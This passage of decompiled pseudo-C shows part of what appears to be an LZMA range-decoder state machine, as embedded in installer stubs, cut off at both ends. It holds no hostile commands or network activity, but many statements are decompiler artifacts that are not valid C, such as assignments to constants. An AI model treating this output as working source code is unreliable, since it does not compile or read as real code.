                                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        												if( *(__ebp - 0x38) >= 4) {
                                        													__eflags =  *(__ebp - 0x38) - 0xa;
                                        													if( *(__ebp - 0x38) >= 0xa) {
                                        														_t98 = __ebp - 0x38;
                                        														 *_t98 =  *(__ebp - 0x38) - 6;
                                        														__eflags =  *_t98;
                                        													} else {
                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                        													}
                                        												} else {
                                        													 *(__ebp - 0x38) = 0;
                                        												}
                                        												__eflags =  *(__ebp - 0x34) - __edx;
                                        												if( *(__ebp - 0x34) == __edx) {
                                        													__ebx = 0;
                                        													__ebx = 1;
                                        													goto L61;
                                        												} else {
                                        													__eax =  *(__ebp - 0x14);
                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        													__eflags = __eax -  *(__ebp - 0x74);
                                        													if(__eax >=  *(__ebp - 0x74)) {
                                        														__eax = __eax +  *(__ebp - 0x74);
                                        														__eflags = __eax;
                                        													}
                                        													__ecx =  *(__ebp - 8);
                                        													__ebx = 0;
                                        													__ebx = 1;
                                        													__al =  *((intOrPtr*)(__eax + __ecx));
                                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                        													goto L41;
                                        												}
                                        											case 7:
                                        												goto L0;
                                        											case 8:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__eax =  *(__ebp - 4);
                                        													__ecx =  *(__ebp - 0x38);
                                        													 *(__ebp - 0x84) = 0xa;
                                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                        												} else {
                                        													__eax =  *(__ebp - 0x38);
                                        													__ecx =  *(__ebp - 4);
                                        													__eax =  *(__ebp - 0x38) + 0xf;
                                        													 *(__ebp - 0x84) = 9;
                                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                        												}
                                        												while(1) {
                                        													L132:
                                        													 *(_t621 - 0x54) = _t614;
                                        													goto L133;
                                        												}
                                        											case 9:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													goto L89;
                                        												}
                                        												__eflags =  *(__ebp - 0x60);
                                        												if( *(__ebp - 0x60) == 0) {
                                        													goto L171;
                                        												}
                                        												__eax = 0;
                                        												__eflags =  *(__ebp - 0x38) - 7;
                                        												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                        												__eflags = _t258;
                                        												0 | _t258 = _t258 + _t258 + 9;
                                        												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                        												goto L75;
                                        											case 0xa:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__eax =  *(__ebp - 4);
                                        													__ecx =  *(__ebp - 0x38);
                                        													 *(__ebp - 0x84) = 0xb;
                                        													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                        													while(1) {
                                        														L132:
                                        														 *(_t621 - 0x54) = _t614;
                                        														goto L133;
                                        													}
                                        												}
                                        												__eax =  *(__ebp - 0x28);
                                        												goto L88;
                                        											case 0xb:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__ecx =  *(__ebp - 0x24);
                                        													__eax =  *(__ebp - 0x20);
                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        												} else {
                                        													__eax =  *(__ebp - 0x24);
                                        												}
                                        												__ecx =  *(__ebp - 0x28);
                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        												L88:
                                        												__ecx =  *(__ebp - 0x2c);
                                        												 *(__ebp - 0x2c) = __eax;
                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        												L89:
                                        												__eax =  *(__ebp - 4);
                                        												 *(__ebp - 0x80) = 0x15;
                                        												__eax =  *(__ebp - 4) + 0xa68;
                                        												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                        												goto L68;
                                        											case 0xc:
                                        												L99:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xc;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t334 = __ebp - 0x70;
                                        												 *_t334 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t334;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												__eax =  *(__ebp - 0x2c);
                                        												goto L101;
                                        											case 0xd:
                                        												L37:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xd;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t122 = __ebp - 0x70;
                                        												 *_t122 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t122;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												L39:
                                        												__eax =  *(__ebp - 0x40);
                                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                        													goto L48;
                                        												}
                                        												__eflags = __ebx - 0x100;
                                        												if(__ebx >= 0x100) {
                                        													goto L54;
                                        												}
                                        												L41:
                                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                        												__ecx =  *(__ebp - 0x58);
                                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                        												 *(__ebp - 0x48) = __eax;
                                        												__eax = __eax + 1;
                                        												__eax = __eax << 8;
                                        												__eax = __eax + __ebx;
                                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        												__ax =  *__esi;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__edx = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													 *(__ebp - 0x40) = 1;
                                        													__cx = __ax >> 5;
                                        													__eflags = __eax;
                                        													__ebx = __ebx + __ebx + 1;
                                        													 *__esi = __ax;
                                        												} else {
                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edx;
                                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        													__ebx = __ebx + __ebx;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													goto L39;
                                        												} else {
                                        													goto L37;
                                        												}
                                        											case 0xe:
                                        												L46:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xe;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t156 = __ebp - 0x70;
                                        												 *_t156 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t156;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												while(1) {
                                        													L48:
                                        													__eflags = __ebx - 0x100;
                                        													if(__ebx >= 0x100) {
                                        														break;
                                        													}
                                        													__eax =  *(__ebp - 0x58);
                                        													__edx = __ebx + __ebx;
                                        													__ecx =  *(__ebp - 0x10);
                                        													__esi = __edx + __eax;
                                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                                        													__ax =  *__esi;
                                        													 *(__ebp - 0x54) = __esi;
                                        													__edi = __ax & 0x0000ffff;
                                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        													__eflags =  *(__ebp - 0xc) - __ecx;
                                        													if( *(__ebp - 0xc) >= __ecx) {
                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        														__cx = __ax;
                                        														_t170 = __edx + 1; // 0x1
                                        														__ebx = _t170;
                                        														__cx = __ax >> 5;
                                        														__eflags = __eax;
                                        														 *__esi = __ax;
                                        													} else {
                                        														 *(__ebp - 0x10) = __ecx;
                                        														0x800 = 0x800 - __edi;
                                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        														__ebx = __ebx + __ebx;
                                        														 *__esi = __cx;
                                        													}
                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        													 *(__ebp - 0x44) = __ebx;
                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                        														continue;
                                        													} else {
                                        														goto L46;
                                        													}
                                        												}
                                        												L54:
                                        												_t173 = __ebp - 0x34;
                                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                        												__eflags =  *_t173;
                                        												goto L55;
                                        											case 0xf:
                                        												L58:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xf;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t203 = __ebp - 0x70;
                                        												 *_t203 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t203;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												L60:
                                        												__eflags = __ebx - 0x100;
                                        												if(__ebx >= 0x100) {
                                        													L55:
                                        													__al =  *(__ebp - 0x44);
                                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                        													goto L56;
                                        												}
                                        												L61:
                                        												__eax =  *(__ebp - 0x58);
                                        												__edx = __ebx + __ebx;
                                        												__ecx =  *(__ebp - 0x10);
                                        												__esi = __edx + __eax;
                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                        												__ax =  *__esi;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__edi = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													_t217 = __edx + 1; // 0x1
                                        													__ebx = _t217;
                                        													__cx = __ax >> 5;
                                        													__eflags = __eax;
                                        													 *__esi = __ax;
                                        												} else {
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edi;
                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        													__ebx = __ebx + __ebx;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													goto L60;
                                        												} else {
                                        													goto L58;
                                        												}
                                        											case 0x10:
                                        												L109:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0x10;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t365 = __ebp - 0x70;
                                        												 *_t365 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t365;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												goto L111;
                                        											case 0x11:
                                        												L68:
                                        												_t614 =  *(_t621 - 0x58);
                                        												 *(_t621 - 0x84) = 0x12;
                                        												while(1) {
                                        													L132:
                                        													 *(_t621 - 0x54) = _t614;
                                        													goto L133;
                                        												}
                                        											case 0x12:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__eax =  *(__ebp - 0x58);
                                        													 *(__ebp - 0x84) = 0x13;
                                        													__esi =  *(__ebp - 0x58) + 2;
                                        													while(1) {
                                        														L132:
                                        														 *(_t621 - 0x54) = _t614;
                                        														goto L133;
                                        													}
                                        												}
                                        												__eax =  *(__ebp - 0x4c);
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                        												__ecx =  *(__ebp - 0x58);
                                        												__eax =  *(__ebp - 0x4c) << 4;
                                        												__eflags = __eax;
                                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                                        												goto L130;
                                        											case 0x13:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													_t469 = __ebp - 0x58;
                                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                        													__eflags =  *_t469;
                                        													 *(__ebp - 0x30) = 0x10;
                                        													 *(__ebp - 0x40) = 8;
                                        													L144:
                                        													 *(__ebp - 0x7c) = 0x14;
                                        													goto L145;
                                        												}
                                        												__eax =  *(__ebp - 0x4c);
                                        												__ecx =  *(__ebp - 0x58);
                                        												__eax =  *(__ebp - 0x4c) << 4;
                                        												 *(__ebp - 0x30) = 8;
                                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                        												L130:
                                        												 *(__ebp - 0x58) = __eax;
                                        												 *(__ebp - 0x40) = 3;
                                        												goto L144;
                                        											case 0x14:
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                        												__eax =  *(__ebp - 0x80);
                                        												 *(_t621 - 0x88) = _t542;
                                        												goto L1;
                                        											case 0x15:
                                        												__eax = 0;
                                        												__eflags =  *(__ebp - 0x38) - 7;
                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        												__al = __al & 0x000000fd;
                                        												__eax = (__eflags >= 0) - 1 + 0xb;
                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                        												goto L120;
                                        											case 0x16:
                                        												__eax =  *(__ebp - 0x30);
                                        												__eflags = __eax - 4;
                                        												if(__eax >= 4) {
                                        													_push(3);
                                        													_pop(__eax);
                                        												}
                                        												__ecx =  *(__ebp - 4);
                                        												 *(__ebp - 0x40) = 6;
                                        												__eax = __eax << 7;
                                        												 *(__ebp - 0x7c) = 0x19;
                                        												 *(__ebp - 0x58) = __eax;
                                        												goto L145;
                                        											case 0x17:
                                        												L145:
                                        												__eax =  *(__ebp - 0x40);
                                        												 *(__ebp - 0x50) = 1;
                                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                        												goto L149;
                                        											case 0x18:
                                        												L146:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0x18;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t484 = __ebp - 0x70;
                                        												 *_t484 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t484;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												L148:
                                        												_t487 = __ebp - 0x48;
                                        												 *_t487 =  *(__ebp - 0x48) - 1;
                                        												__eflags =  *_t487;
                                        												L149:
                                        												__eflags =  *(__ebp - 0x48);
                                        												if( *(__ebp - 0x48) <= 0) {
                                        													__ecx =  *(__ebp - 0x40);
                                        													__ebx =  *(__ebp - 0x50);
                                        													0 = 1;
                                        													__eax = 1 << __cl;
                                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                        													__eax =  *(__ebp - 0x7c);
                                        													 *(__ebp - 0x44) = __ebx;
                                        													while(1) {
                                        														 *(_t621 - 0x88) = _t542;
                                        														goto L1;
                                        													}
                                        												}
                                        												__eax =  *(__ebp - 0x50);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        												__eax =  *(__ebp - 0x58);
                                        												__esi = __edx + __eax;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__ax =  *__esi;
                                        												__edi = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													__cx = __ax >> 5;
                                        													__eax = __eax - __ecx;
                                        													__edx = __edx + 1;
                                        													__eflags = __edx;
                                        													 *__esi = __ax;
                                        													 *(__ebp - 0x50) = __edx;
                                        												} else {
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edi;
                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													goto L148;
                                        												} else {
                                        													goto L146;
                                        												}
                                        											case 0x19:
                                        												__eflags = __ebx - 4;
                                        												if(__ebx < 4) {
                                        													 *(__ebp - 0x2c) = __ebx;
                                        													L119:
                                        													_t393 = __ebp - 0x2c;
                                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                                        													__eflags =  *_t393;
                                        													L120:
                                        													__eax =  *(__ebp - 0x2c);
                                        													__eflags = __eax;
                                        													if(__eax == 0) {
                                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                        														goto L170;
                                        													}
                                        													__eflags = __eax -  *(__ebp - 0x60);
                                        													if(__eax >  *(__ebp - 0x60)) {
                                        														goto L171;
                                        													}
                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                        													__eax =  *(__ebp - 0x30);
                                        													_t400 = __ebp - 0x60;
                                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                        													__eflags =  *_t400;
                                        													goto L123;
                                        												}
                                        												__ecx = __ebx;
                                        												__eax = __ebx;
                                        												__ecx = __ebx >> 1;
                                        												__eax = __ebx & 0x00000001;
                                        												__ecx = (__ebx >> 1) - 1;
                                        												__al = __al | 0x00000002;
                                        												__eax = (__ebx & 0x00000001) << __cl;
                                        												__eflags = __ebx - 0xe;
                                        												 *(__ebp - 0x2c) = __eax;
                                        												if(__ebx >= 0xe) {
                                        													__ebx = 0;
                                        													 *(__ebp - 0x48) = __ecx;
                                        													L102:
                                        													__eflags =  *(__ebp - 0x48);
                                        													if( *(__ebp - 0x48) <= 0) {
                                        														__eax = __eax + __ebx;
                                        														 *(__ebp - 0x40) = 4;
                                        														 *(__ebp - 0x2c) = __eax;
                                        														__eax =  *(__ebp - 4);
                                        														__eax =  *(__ebp - 4) + 0x644;
                                        														__eflags = __eax;
                                        														L108:
                                        														__ebx = 0;
                                        														 *(__ebp - 0x58) = __eax;
                                        														 *(__ebp - 0x50) = 1;
                                        														 *(__ebp - 0x44) = 0;
                                        														 *(__ebp - 0x48) = 0;
                                        														L112:
                                        														__eax =  *(__ebp - 0x40);
                                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                        															_t391 = __ebp - 0x2c;
                                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                        															__eflags =  *_t391;
                                        															goto L119;
                                        														}
                                        														__eax =  *(__ebp - 0x50);
                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        														__eax =  *(__ebp - 0x58);
                                        														__esi = __edi + __eax;
                                        														 *(__ebp - 0x54) = __esi;
                                        														__ax =  *__esi;
                                        														__ecx = __ax & 0x0000ffff;
                                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                        														__eflags =  *(__ebp - 0xc) - __edx;
                                        														if( *(__ebp - 0xc) >= __edx) {
                                        															__ecx = 0;
                                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                        															__ecx = 1;
                                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                        															__ebx = 1;
                                        															__ecx =  *(__ebp - 0x48);
                                        															__ebx = 1 << __cl;
                                        															__ecx = 1 << __cl;
                                        															__ebx =  *(__ebp - 0x44);
                                        															__ebx =  *(__ebp - 0x44) | __ecx;
                                        															__cx = __ax;
                                        															__cx = __ax >> 5;
                                        															__eax = __eax - __ecx;
                                        															__edi = __edi + 1;
                                        															__eflags = __edi;
                                        															 *(__ebp - 0x44) = __ebx;
                                        															 *__esi = __ax;
                                        															 *(__ebp - 0x50) = __edi;
                                        														} else {
                                        															 *(__ebp - 0x10) = __edx;
                                        															0x800 = 0x800 - __ecx;
                                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        															 *__esi = __dx;
                                        														}
                                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        														if( *(__ebp - 0x10) >= 0x1000000) {
                                        															L111:
                                        															_t368 = __ebp - 0x48;
                                        															 *_t368 =  *(__ebp - 0x48) + 1;
                                        															__eflags =  *_t368;
                                        															goto L112;
                                        														} else {
                                        															goto L109;
                                        														}
                                        													}
                                        													__ecx =  *(__ebp - 0xc);
                                        													__ebx = __ebx + __ebx;
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        													 *(__ebp - 0x44) = __ebx;
                                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                        														__ecx =  *(__ebp - 0x10);
                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        														__ebx = __ebx | 0x00000001;
                                        														__eflags = __ebx;
                                        														 *(__ebp - 0x44) = __ebx;
                                        													}
                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                        														L101:
                                        														_t338 = __ebp - 0x48;
                                        														 *_t338 =  *(__ebp - 0x48) - 1;
                                        														__eflags =  *_t338;
                                        														goto L102;
                                        													} else {
                                        														goto L99;
                                        													}
                                        												}
                                        												__edx =  *(__ebp - 4);
                                        												__eax = __eax - __ebx;
                                        												 *(__ebp - 0x40) = __ecx;
                                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                        												goto L108;
                                        											case 0x1a:
                                        												L56:
                                        												__eflags =  *(__ebp - 0x64);
                                        												if( *(__ebp - 0x64) == 0) {
                                        													 *(__ebp - 0x88) = 0x1a;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x68);
                                        												__al =  *(__ebp - 0x5c);
                                        												__edx =  *(__ebp - 8);
                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        												 *( *(__ebp - 0x68)) = __al;
                                        												__ecx =  *(__ebp - 0x14);
                                        												 *(__ecx +  *(__ebp - 8)) = __al;
                                        												__eax = __ecx + 1;
                                        												__edx = 0;
                                        												_t192 = __eax %  *(__ebp - 0x74);
                                        												__eax = __eax /  *(__ebp - 0x74);
                                        												__edx = _t192;
                                        												goto L79;
                                        											case 0x1b:
                                        												L75:
                                        												__eflags =  *(__ebp - 0x64);
                                        												if( *(__ebp - 0x64) == 0) {
                                        													 *(__ebp - 0x88) = 0x1b;
                                        													goto L170;
                                        												}
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
                                        												__edx =  *(__ebp - 8);
                                        												__cl =  *(__eax + __edx);
                                        												__eax =  *(__ebp - 0x14);
                                        												 *(__ebp - 0x5c) = __cl;
                                        												 *(__eax + __edx) = __cl;
                                        												__eax = __eax + 1;
                                        												__edx = 0;
                                        												_t274 = __eax %  *(__ebp - 0x74);
                                        												__eax = __eax /  *(__ebp - 0x74);
                                        												__edx = _t274;
                                        												__eax =  *(__ebp - 0x68);
                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        												_t283 = __ebp - 0x64;
                                        												 *_t283 =  *(__ebp - 0x64) - 1;
                                        												__eflags =  *_t283;
                                        												 *( *(__ebp - 0x68)) = __cl;
                                        												L79:
                                        												 *(__ebp - 0x14) = __edx;
                                        												goto L80;
                                        											case 0x1c:
                                        												while(1) {
                                        													L123:
                                        													__eflags =  *(__ebp - 0x64);
                                        													if( *(__ebp - 0x64) == 0) {
                                        														break;
                                        													}
                                        													__eax =  *(__ebp - 0x14);
                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        													__eflags = __eax -  *(__ebp - 0x74);
                                        													if(__eax >=  *(__ebp - 0x74)) {
                                        														__eax = __eax +  *(__ebp - 0x74);
                                        														__eflags = __eax;
                                        													}
                                        													__edx =  *(__ebp - 8);
                                        													__cl =  *(__eax + __edx);
                                        													__eax =  *(__ebp - 0x14);
                                        													 *(__ebp - 0x5c) = __cl;
                                        													 *(__eax + __edx) = __cl;
                                        													__eax = __eax + 1;
                                        													__edx = 0;
                                        													_t414 = __eax %  *(__ebp - 0x74);
                                        													__eax = __eax /  *(__ebp - 0x74);
                                        													__edx = _t414;
                                        													__eax =  *(__ebp - 0x68);
                                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
